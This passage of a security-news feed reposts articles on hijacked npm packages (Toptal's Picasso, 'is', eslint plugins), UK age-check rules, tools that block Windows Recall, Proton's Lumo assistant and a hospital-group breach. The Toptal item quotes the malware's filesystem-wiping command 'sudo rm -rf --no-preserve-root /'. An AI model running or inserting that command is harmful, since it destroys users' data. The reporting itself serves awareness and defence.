				<img alt="npm-phishing-email-640x596.jpeg" class="center medium" decoding="async" height="596" loading="lazy" sizes="auto, (max-width: 640px) 100vw, 640px" srcset="https://cdn.arstechnica.net/wp-content/uploads/2025/07/npm-phishing-email-640x596.jpeg 640w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/npm-phishing-email-1024x954.jpeg 1024w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/npm-phishing-email-768x715.jpeg 768w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/npm-phishing-email-1536x1430.jpeg 1536w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/npm-phishing-email-980x913.jpeg 980w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/npm-phishing-email-1440x1341.jpeg 1440w, https://cdn.arstechnica.net/wp-content/uploads/2025/07/npm-phishing-email.jpeg 1600w" width="640" src="https://cdn.arstechnica.net/wp-content/uploads/2025/07/npm-phishing-email-640x596.jpeg">
				<div class="pswp-caption-content" id="caption-2108339">
					<em>A phishing email targeting npm account holders. </em>

					<div class="ars-gallery-caption-credit">
						<em><em>Credit: Socket </em></em>
					</div>
				</div>
			</div>
		</div>
	</div>
</figure>

<p>
	<a href="https://socket.dev/blog/npm-is-package-hijacked-in-expanding-supply-chain-attack" rel="external nofollow">Also compromised</a> was an npm package known as 'is.' It receives roughly 2.8 million downloads weekly.
</p>

<h2>
	Potential for widespread damage
</h2>

<p>
	Supply-chain attacks like the ones Socket has flagged have the potential to cause widespread damage. Many packages available in repositories are dependencies, meaning the dependencies must be incorporated into downstream packages for those packages to work. In many developer flows, new dependency versions are downloaded and incorporated into the downstream packages automatically.
</p>

<p>
	 
</p>

<p>
	The packages flagged in the three attacks are:
</p>

<p>
	 
</p>

<ul>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-tailwind</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-charts</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-shared</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-provider</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-select</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-quote</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-forms</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@xene/core</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-utils</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@toptal/picasso-typography</span><span style="font-weight: 400;">.</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">is version 3.3.1, 5.0.0</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">got-fetch version 5.1.11, 5.1.12</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Eslint-config-prettier, versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Eslint-plugin-prettier, versions 4.2.2 and 4.2.3</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Synckit, version 0.11.9</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">@pkgr/core, version 0.2.8</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Napi-postinstall, version 0.3.1</span>
	</li>
</ul>

<p>
	 
</p>

<p>
	Developers who work with any of the packages targeted should ensure none of the malicious versions have been installed or incorporated into their wares. Developers working with open source packages should:
</p>

<p>
	 
</p>

<ul>
	<li>
		Monitor repository visibility changes in search of suspicious or unusual publishing of packages
	</li>
	<li>
		Review package.json lifecycle scripts before installing dependencies
	</li>
	<li>
		Use automated security scanning in continuous integration and continuous delivery pipelines
	</li>
	<li>
		Regularly rotate authentication tokens
	</li>
	<li>
		Use multifactor authentication to safeguard repository accounts
	</li>
</ul>

<p>
	 
</p>

<p>
	Additionally, repositories that haven’t yet made MFA mandatory should do so in the near future.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2025/07/open-source-repositories-are-seeing-a-rash-of-supply-chain-attacks/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Saturday 26 July 2025 at 1:04 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30445</guid><pubDate>Sat, 26 Jul 2025 03:05:08 +0000</pubDate></item><item><title>UK enforces strict new online age checks today</title><link>https://nsaneforums.com/news/security-privacy-news/uk-enforces-strict-new-online-age-checks-today-r30436/</link><description><![CDATA[<p>
	As of today, July 25, 2025, new Ofcom regulations mandate that “highly effective” age checks are in place for online services. These new rules apply to any websites or platforms that host pornography, self-harm, suicide, or eating disorder content. Major platforms like Pornhub, Bluesky, Discord, Grindr, Reddit, and X have committed to implementing age-gating.
</p>

<p>
	 
</p>

<p>
	These age checks are part of the broader Online Safety Act, which is designed to make the internet safer, particularly for kids. These measures move away from just confirming you’re 18 by clicking a button to having to actually verify your age with ID or a face scan, but this move is <a automate_uuid="56b8a153-7e8f-4a10-b371-9b2f44b534ec" href="https://www.neowin.net/news/uks-new-age-verification-law-puts-your-privacy-at-risk/" rel="external nofollow">not without its critics</a>.
</p>

<p>
	 
</p>

<p>
	Starting today, Ofcom will actively check compliance with the new rules and start launching investigations into non-compliant services, starting next week. The current enforcement program that’s focused on studio porn services is extending to all platforms allowing user-shared pornographic material, not just those websites dedicated to that. Ofcom is also launching another enforcement program that will target websites specifically dedicated to harmful content like self-harm, suicide, eating disorders, and extreme violence/gore.
</p>

<p>
	 
</p>

<p>
	Ofcom has strong enforcement powers under the Online Safety Act, it can dish out fines of up to 10% of qualifying worldwide revenue or £18 million. For the worst offenders, Ofcom can even get websites blocked in the UK. Ofcom is already investigating 11 companies that it doesn’t think are following the rules.
</p>

<p>
	 
</p>

<p>
	Aside from age checks, Ofcom’s Codes also require websites to protect children from dangerous stunts, misogynistic, violent, hateful, or abusive material, and online bullying. Algorithms of social media will need to be configured to block harmful content in children’s feeds, for example. Ofcom will be launching an extensive monitoring program requiring risk assessments by August 7 and practical action disclosures by September 30.
</p>

<p>
	 
</p>

<p>
	While some have criticized the Online Safety Act, research cited by Ofcom shows that 71% of UK parents think the changes will positively impact children’s online safety, with 77% being optimistic about the age checks specifically. With that said, a significant minority of parents (41%) are skeptical about whether tech firms will follow the rules.
</p>

<p>
	 
</p>

<p>
	Source: <a automate_uuid="63102178-eef3-412b-8c10-c5d4e1eeafd0" href="https://www.ofcom.org.uk/online-safety/protecting-children/online-age-checks-must-be-in-force-from-tomorrow" rel="external nofollow">Ofcom</a> | Image via <a automate_uuid="50f26f0b-1cbe-473f-83ee-042240051da9" href="http://Depositphotos.com" rel="external nofollow">Depositphotos.com</a>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/uk-enforces-strict-new-online-age-checks-today/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Saturday 26 July 2025 at 4:31 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30436</guid><pubDate>Fri, 25 Jul 2025 18:32:12 +0000</pubDate></item><item><title>AdGuard is yet another app to block Windows Recall</title><link>https://nsaneforums.com/news/security-privacy-news/adguard-is-yet-another-app-to-block-windows-recall-r30435/</link><description><![CDATA[<p>
	Windows Recall is one of the most controversial Windows features. After the <a automate_uuid="d893a3e0-c749-4a08-a8a9-175e2e3bd6a3" href="https://www.neowin.net/news/windows-11s-new-ai-feature-makes-it-way-too-easy-to-steal-everything-you-viewed-or-typed/" rel="external nofollow">misfired launch</a> and the scandal that followed, Microsoft implemented <a automate_uuid="b5e9fe59-8865-453f-af34-d8558f3ddf97" href="https://www.neowin.net/news/microsoft-reveals-security-improvements-for-recall-including-the-ability-to-uninstall-it/" rel="external nofollow">plenty of security measures and improvements</a>. Still, some believe that Recall's reputation is tarnished forever. Besides, not everyone is comfortable with using the feature that takes screenshots of everything you do. As such, privacy-focused apps, <a automate_uuid="305142f3-22ec-456d-9e77-12e97ff83250" href="https://www.neowin.net/news/brave-browser-blocks-windows-feature-that-takes-screenshots-of-everything-you-do-on-your-pc/" rel="external nofollow">browsers</a>, and <a automate_uuid="fc092962-4b84-4100-8339-cd28e6beef66" href="https://www.neowin.net/news/windows-11-recall-will-fail-to-capture-signal-chats-as-long-as-you-have-this-feature-enabled/" rel="external nofollow">messengers are now offering blocks</a> for Recall. AdGuard is the latest one to join them.
</p>

<p>
	 
</p>

<p>
	AdGuard for Windows 7.21 introduces a new feature that lets you turn off Windows Recall. Although Recall is a strictly opt-in experience and it has several security measures, AdGuard developers believe that it is not enough. They argue that the feature idea itself is unsettling, PINs are easy to crack, and <a automate_uuid="e12d3f95-23e5-4aa2-b907-3714d7bd6f8c" href="https://www.neowin.net/news/despite-assurances-windows-11s-recall-still-captures-a-lot-of-sensitive-data/" rel="external nofollow">filters sometimes fail to engage</a>. Here is what AdGuard says in <a automate_uuid="7ab0dc0e-4c35-4b8e-86a5-d2a33a7b43ff" href="https://adguard.com/en/blog/adguard-for-windows-v7-21.html" rel="external nofollow">the announcement post</a><span>:</span>
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		PINs are easy to crack, and filters may fail to detect sensitive content. Leaving backdoors wide open and hoping everything works as intended — or that Microsoft will always act in good faith — just isn’t a solid privacy strategy.
	</p>

	<p>
		 
	</p>

	<p>
		That’s exactly why AdGuard has an entire section of settings dedicated to blocking Windows tracking. And now, it includes one more.
	</p>
</blockquote>

<p>
	If you use AdGuard on your PC, you can find the new "Disable Windows Recall" feature in Settings &gt; Tracking Protection.
</p>

<p>
	 
</p>

<p>
	As of now, Recall is only available on Copilot+ PCs. This month's non-security update expanded Recall to more users, making the feature <a automate_uuid="193dba14-1091-48aa-86cb-258b443bf6b1" href="https://www.neowin.net/news/windows-11-24h2-gets-big-feature-update-with-improved-settings-new-bsod-and-more/" rel="external nofollow">available in the European Economic Area</a>. And with Intel working on <a automate_uuid="d0875d80-44a3-4f03-8b19-68c54a8e4fa8" href="https://www.neowin.net/news/copilot-pcs-are-coming-to-desktop-thanks-to-intels-upcoming-processors/" rel="external nofollow">the next-generation desktop processors with improved NPUs</a>, you can expect Recall and <a automate_uuid="df4eadae-36bb-45a0-abc3-459c30ce67ce" href="https://www.neowin.net/news/windows-11-receives-a-handful-of-new-ai-features/" rel="external nofollow">other recently introduced AI features</a> to make their way to more users with desktop PCs.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/adguard-is-yet-another-app-to-block-windows-recall/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Saturday 26 July 2025 at 4:28 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30435</guid><pubDate>Fri, 25 Jul 2025 18:30:15 +0000</pubDate></item><item><title>Hackers breach Toptal GitHub account, publish malicious npm packages</title><link>https://nsaneforums.com/news/security-privacy-news/hackers-breach-toptal-github-account-publish-malicious-npm-packages-r30399/</link><description><![CDATA[<p>
	Hackers compromised Toptal's GitHub organization account and used their access to publish ten malicious packages on the Node Package Manager (NPM) index.
</p>

<p>
	 
</p>

<p>
	The packages included data-stealing code that collected GitHub authentication tokens and then wiped the victims' systems.
</p>

<p>
	 
</p>

<p>
	Toptal is a freelance talent marketplace that connects companies with software developers, designers, and finance experts. The company also maintains internal developer tools and design systems, most notably Picasso, which they make available through GitHub and NPM.
</p>

<p>
	 
</p>

<p>
	Attackers hijacked Toptal's GitHub organization on July 20, and almost immediately made public all 73 of the repositories available, exposing private projects and source code.
</p>

<p>
	 
</p>

<p>
	<img alt="Tweet" class="ipsImage" height="600" width="573" src="https://www.bleepstatic.com/images/news/u/1220909/2025/July/tweet(2).png">
</p>

<p>
	 
</p>

<p>
	In the days that followed, the attackers modified the source code of Picasso on GitHub to include malware and published 10 malicious packages on NPM as Toptal, making them appear as legitimate updates.
</p>

<p>
	 
</p>

<p>
	The malicious packages and modified versions are:
</p>

<p>
	 
</p>

<ul>
	<li>
		@toptal/picasso-tailwind (v3.1.0)
	</li>
	<li>
		@toptal/picasso-charts (v59.1.4)
	</li>
	<li>
		@toptal/picasso-shared (v15.1.0)
	</li>
	<li>
		@toptal/picasso-provider (v5.1.1)
	</li>
	<li>
		@toptal/picasso-select (v4.2.2)
	</li>
	<li>
		@toptal/picasso-quote (v2.1.7)
	</li>
	<li>
		@toptal/picasso-forms (v73.3.2)
	</li>
	<li>
		@xene/core (v0.4.1)
	</li>
	<li>
		@toptal/picasso-utils (v3.2.0)
	</li>
	<li>
		@toptal/picasso-typography (v4.1.4)
	</li>
</ul>

<p>
	 
</p>

<p>
	The malicious packages were downloaded roughly 5,000 times before being detected, likely infecting developers with malware.
</p>

<p>
	 
</p>

<p>
	The hackers injected the malicious code into 'package.json' files to add two functions: steal data ('preinstall' script) and wipe hosts ('postinstall' script).
</p>

<p>
	 
</p>

<p>
	The first extracts the victim's CLI authentication token and sends it to an attacker-controlled webhook URL, granting them unauthorized access to the target's GitHub account.
</p>

<p>
	 
</p>

<p>
	After exfiltrating the data, the second script attempts to delete the entire filesystem with 'sudo rm -rf --no-preserve-root /' on Linux systems, or recursively and silently delete files on Windows.
</p>

<p>
	 
</p>

<p>
	According to code security platform <a href="https://socket.dev/blog/toptal-s-github-organization-hijacked-10-malicious-packages-published" rel="external nofollow" target="_blank">Socket</a>, Toptal deprecated the malicious packages on July 23 and reverted to safe versions, but issued no public statement to alert users who had downloaded the malicious releases to the risks.
</p>

<p>
	 
</p>

<p>
	Although the initial compromise method remains unknown, Socket lists multiple possibilities ranging from insider threats to phishing attacks targeting Toptal developers.
</p>

<p>
	 
</p>

<p>
	BleepingComputer has contacted Toptal for a statement, but we are still waiting for their response.
</p>

<p>
	 
</p>

<p>
	If you have installed any of the malicious packages, you are advised to revert to a previous stable version as soon as possible.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/hackers-breach-toptal-github-account-publish-malicious-npm-packages/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Friday 25 July 2025 at 2:15 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30399</guid><pubDate>Thu, 24 Jul 2025 16:16:52 +0000</pubDate></item><item><title>Proton launches Lumo, privacy-focused AI assistant with encrypted chats</title><link>https://nsaneforums.com/news/security-privacy-news/proton-launches-lumo-privacy-focused-ai-assistant-with-encrypted-chats-r30391/</link><description><![CDATA[<p>
	Proton, a Swiss-based company that develops privacy-focused apps and services, expanded its product portfolio with a new AI assistant, Lumo, that "gives people the power of AI, without demanding any personal data in return."
</p>

<p>
	 
</p>

<p>
	Lumo works like ChatGPT, Copilot, or any other chatbot. While it does not offer extensive features and capabilities like voice mode or image generation, it makes up for that with improved privacy, encryption, and open-source LLMs. Lumo does not store logs, and users' chats are encrypted and only available on their devices. Proton promises not to share any user data with third parties, advertisers, or governments, nor to use it to train its models.
</p>

<figure class="image image--expandable">
	<img alt="AI assistant Lumo by Proton" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/07/1753263845_13_lumo_pr.webp">
</figure>

<p>
	Besides regular chats, Lumo supports web search. It is turned off by default for improved privacy, but users can toggle on web search mode and ask Lumo to search using "privacy-friendly" search engines. The assistant can also analyze uploaded files and access documents stored in Proton Drive.
</p>

<p>
	 
</p>

<p>
	Here is what Andy Yen, Proton's founder and CEO, said about the launch of Lumo:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		“Big Tech is using AI to supercharge the collection of sensitive user data to accelerate the world’s transition to surveillance capitalism. For this reason, we believe it is essential to provide an alternative that protects privacy and serves users as opposed to exploiting them. AI should not become the world’s most powerful surveillance tool, and our vision for Lumo is AI that puts people ahead of profits.”
	</p>
</blockquote>

<figure class="image image--expandable">
	<img alt="AI assistant Lumo by Proton" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/07/1753263838_11_lumo_pr.webp">
</figure>

<p>
	You can use Lumo without a Proton account (Guest mode) with a limited number of questions per week. With a free Proton account, users can ask more questions, access chat history, and upload files. Finally, there is a premium tier, which offers unlimited chats, extended chat history, unlimited chat favorites, and the ability to upload multiple or large files. Lumo Plus costs $12.99 per month or $119.88 per year, and it is included in the Proton Visionary plan.
</p>

<p>
	 
</p>

<p>
	Lumo is now available on <a automate_uuid="3296756f-0b4c-4fd0-87c3-9097863c80d7" href="http://lumo.proton.me" rel="external nofollow">lumo.proton.me</a>. There are also dedicated mobile apps, which you can download from the Apple App Store <a automate_uuid="7d3c3cd7-f086-42d1-82a4-1e6b41567cbb" href="https://apps.apple.com/app/id6746714949" rel="external nofollow">here</a> and the Google Play Store <a automate_uuid="74170ea0-d8e8-427a-ac66-b354f64a231a" href="https://play.google.com/store/apps/details?id=me.proton.android.lumo" rel="external nofollow">here</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/proton-launches-lumo-privacy-focused-ai-assistant-with-encrypted-chats/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Thursday 24 July 2025 at 4:26 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30391</guid><pubDate>Wed, 23 Jul 2025 18:27:21 +0000</pubDate></item><item><title>NPM package &#x2018;is&#x2019; with 2.8M weekly downloads infected devs with malware</title><link>https://nsaneforums.com/news/security-privacy-news/npm-package-%E2%80%98is%E2%80%99-with-28m-weekly-downloads-infected-devs-with-malware-r30390/</link><description><![CDATA[<p>
	The popular NPM package 'is' has been compromised in a supply chain attack that injected backdoor malware, giving attackers full access to compromised devices.
</p>

<p>
	 
</p>

<p>
	This occurred after maintainer accounts were hijacked via phishing, followed by unauthorized owner changes that went unnoticed for several hours, potentially compromising many developers who downloaded the new releases.
</p>

<p>
	 
</p>

<p>
	The 'is' package is a lightweight JavaScript utility library that provides a wide variety of type checking and value validation functions.
</p>

<p>
	 
</p>

<p>
	The software has over 2.8 million weekly downloads on the NPM package index. It is used extensively as a low-level utility dependency in development tools, testing libraries, build systems, and backend and CLI projects.
</p>

<p>
	 
</p>

<p>
	On July 19, 2025, the package's primary maintainer, John Harband, announced that versions 3.3.1 through 5.0.0 contained malware and were removed roughly 6 hours after threat actors submitted them to npm.
</p>

<p>
	 
</p>

<p>
	<a href="https://bsky.app/profile/jordan.har.band/post/3ludlbnstr22w" rel="external nofollow" target="_blank"><img alt="Maintainer" class="ipsImage" height="600" width="559" src="https://www.bleepstatic.com/images/news/u/1220909/2025/July/maintainer.png"></a>
</p>

<p>
	 
</p>

<p>
	This was the result of the same <a href="https://www.bleepingcomputer.com/news/security/popular-npm-linter-packages-hijacked-via-phishing-to-drop-malware/" rel="external nofollow" target="_blank">NPM supply chain attack</a> that used the fake domain' npnjs[.]com' to snatch maintainer credentials and then publish laced versions of popular packages.
</p>

<p>
	 
</p>

<p>
	Besides 'is,' the following packages were confirmed to be pushing malware, compromised in the same attack:
</p>

<p>
	 
</p>

<ul>
	<li>
		eslint-config-prettier (8.10.1, 9.1.1, 10.1.6, 10.1.7)
	</li>
	<li>
		eslint-plugin-prettier (4.2.2, 4.2.3)
	</li>
	<li>
		synckit (0.11.9)
	</li>
	<li>
		@pkgr/core (0.2.8)
	</li>
	<li>
		napi-postinstall (0.3.1)
	</li>
	<li>
		got-fetch (5.1.11, 5.1.12)
	</li>
</ul>

<p>
	 
</p>

<p>
	Socket reports that 'is' contains a cross-platform JavaScript malware loader that opens a WebSocket-based backdoor, enabling remote code execution.
</p>

<p>
	 
</p>

<p>
	"Once active, it queries Node's os module to collect the hostname, operating system, and CPU details, and captures all environment variables from process.env," <a href="https://socket.dev/blog/npm-is-package-hijacked-in-expanding-supply-chain-attack" rel="external nofollow" target="_blank">explains Socket.</a>
</p>

<p>
	 
</p>

<p>
	"It then dynamically imports the ws library to exfiltrate this data over a WebSocket connection."
</p>

<p>
	 
</p>

<p>
	"Every message received over the socket is treated as executable JavaScript, giving the threat actor an instant, interactive remote shell."
</p>

<p>
	 
</p>

<p>
	The researchers also analyzed the payload in 'eslint' and the rest of the packages, finding a Windows infostealer called 'Scavanger' which targets sensitive information stored in web browsers.
</p>

<p>
	 
</p>

<p>
	The malware features evasion mechanisms such as indirect syscalls, encrypted command and control (C2) communications, but it may trigger security warnings in Chrome due to flag manipulation.
</p>

<p>
	 
</p>

<p>
	Based on the attack pattern, the threat actors may have compromised additional maintainer credentials and are preparing to experiment with stealthier payloads on new software packages.
</p>

<p>
	 
</p>

<p>
	To prevent this, maintainers should reset their passwords and rotate all tokens immediately, and developers should only use known-to-be-safe versions from before July 18, 2025.
</p>

<p>
	 
</p>

<p>
	Auto-updating should be turned off, while lockfiles can be used to freeze releases on specific dependency versions.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/npm-package-is-with-28m-weekly-downloads-infected-devs-with-malware/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Thursday 24 July 2025 at 4:23 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30390</guid><pubDate>Wed, 23 Jul 2025 18:25:54 +0000</pubDate></item><item><title>Brave browser blocks Windows feature that takes screenshots of everything you do on your PC</title><link>https://nsaneforums.com/news/security-privacy-news/brave-browser-blocks-windows-feature-that-takes-screenshots-of-everything-you-do-on-your-pc-r30371/</link><description><![CDATA[<p>
	If there's anything Microsoft Build 2024 will be remembered for, it's the <a automate_uuid="9b52b9a4-4ea2-4c51-909f-945955379939" href="https://www.neowin.net/news/windows-11s-ai-explorer-debuts-as-recall-a-feature-that-remembers-everything-you-do/" rel="external nofollow">introduction of the controversial Windows Recall on its new Copilot+ PCs</a>. Pitched as a "photographic memory" for your computer, this feature works by constantly taking screenshots of your activity to build a detailed and searchable timeline of everything you have ever seen or done.
</p>

<p>
	 
</p>

<p>
	Almost immediately, critics and security researchers<a automate_uuid="6c9193e7-a3d6-4076-baa3-abe12b14c46b" href="https://www.neowin.net/news/windows-11s-new-ai-feature-makes-it-way-too-easy-to-steal-everything-you-viewed-or-typed/" rel="external nofollow"> labeled the feature a privacy nightmare</a>, pointing out that a single piece of malware could gain access to a user's entire digital life. In response to the backlash, Microsoft promised that users will be able to filter which apps get recorded, but some developers are not waiting around.
</p>

<p>
	 
</p>

<p>
	Just about a month after the feature <a automate_uuid="460c4494-98bb-4c5a-9f4b-7006fd75215f" href="https://www.neowin.net/news/windows-11s-flagship-ai-feature-is-now-publicly-available/" rel="external nofollow">became generally available for Copilot+ PCs </a>(it is <a automate_uuid="73a6ab8c-98aa-4903-9bc4-0a8f7fb2c6bb" href="https://www.neowin.net/news/windows-11-24h2-gets-big-feature-update-with-improved-settings-new-bsod-and-more/" rel="external nofollow">now rolling out to users in Europe</a>), some app developers took matters into their own hands to protect their users.
</p>

<p>
	 
</p>

<p>
	<a automate_uuid="431ae78e-a9bd-4c69-bd1f-03b7a4b90fb4" href="https://www.neowin.net/news/windows-11-recall-will-fail-to-capture-signal-chats-as-long-as-you-have-this-feature-enabled/" rel="external nofollow">One such company was Signal</a>, which implemented an opt-out feature called "Screen Security" to prevent its chats from being captured. It cleverly uses a Digital Rights Management (DRM) flag to black out the application window during a screenshot attempt, using the same technology that streaming services like Netflix use to prevent people from recording movies.
</p>

<p>
	 
</p>

<p>
	Now, Brave Browser has joined the party, announcing on X that it will block Recall by default with its v1.81 update, which is expected in the coming weeks.
</p>

<p>
	 
</p>

<div class="ipsEmbeddedOther" contenteditable="false">
	<iframe allowfullscreen="" class="ipsEmbed_finishedLoading" data-controller="core.front.core.autosizeiframe" data-embedid="embed9497571091" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/brave/status/1947721520446382261" style="overflow: hidden; height: 641px;"></iframe>
</div>

<p>
	While Microsoft stated that Recall would not capture content from private browsing windows, Brave's new update just tells the Windows operating system that <em>all</em> of its browser windows are private. This prevents Recall from snapshotting anything you do in Brave, not just the activity in a designated private tab.
</p>

<p>
	 
</p>

<p>
	In its announcement, the company did give Microsoft some credit for making changes following the initial public outcry, such as <a automate_uuid="c7d974d1-6d6d-4814-bc4d-8379aa8483f7" href="https://www.neowin.net/news/microsoft-gives-in-makes-recall-an-opt-in-feature-and-introduces-new-privacy-measures/" rel="external nofollow">making Recall an opt-in feature.</a> However, the company still feels that giving any application unrestricted access to a user's browsing history is a huge risk.
</p>

<p>
	 
</p>

<p>
	If you, for some reason, like Windows Recall, you can disable the upcoming protection by navigating to Settings, then Privacy and Security, and toggling off the "Block Microsoft Recall" option.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/brave-browser-blocks-windows-feature-that-takes-screenshots-of-everything-you-do-on-your-pc/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 23 July 2025 at 1:00 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30371</guid><pubDate>Wed, 23 Jul 2025 03:02:14 +0000</pubDate></item><item><title>Major European healthcare network discloses security breach</title><link>https://nsaneforums.com/news/security-privacy-news/major-european-healthcare-network-discloses-security-breach-r30370/</link><description><![CDATA[<p>
	AMEOS Group, an operator of a massive healthcare network in Central Europe, has announced it has suffered a security breach that may have exposed customer, employee, and partner information.
</p>

<p>
	 
</p>

<p>
	The organization published a statement on its website, as required by Article 34 of the General Data Protection Regulation (GDPR), which mandates a public notice in the event of a data breach.
</p>

<p>
	 
</p>

<p>
	AMEOS is a Zurich-based healthcare provider that employs 18,000 staff in over 100 hospitals, clinics, rehabilitation centers, and nursing homes located across Switzerland, Germany, and Austria.
</p>

<p>
	 
</p>

<p>
	It is one of the largest private hospital groups in the broader DACH region, with over 10,000 beds and annual revenue exceeding $1.4 billion.
</p>

<p>
	 
</p>

<p>
	AMEOS informs that, despite the "extensive security measures" in place, external actors gained unauthorized access to its IT systems and accessed sensitive information.
</p>

<p>
	 
</p>

<p>
	"Data belonging to patients, employees, and partners—as well as contact information relating to you or your company—may have been affected due to unauthorized access," <a href="https://www.ameos.eu/datenschutz/datenschutzvorfall-gem-art-34-dsgvo/" rel="external nofollow" target="_blank">reads the announcement</a>.
</p>

<p>
	 
</p>

<p>
	"It cannot be ruled out that this data may be misused on the internet to the detriment of those affected or made accessible to third parties."
</p>

<p>
	 
</p>

<p>
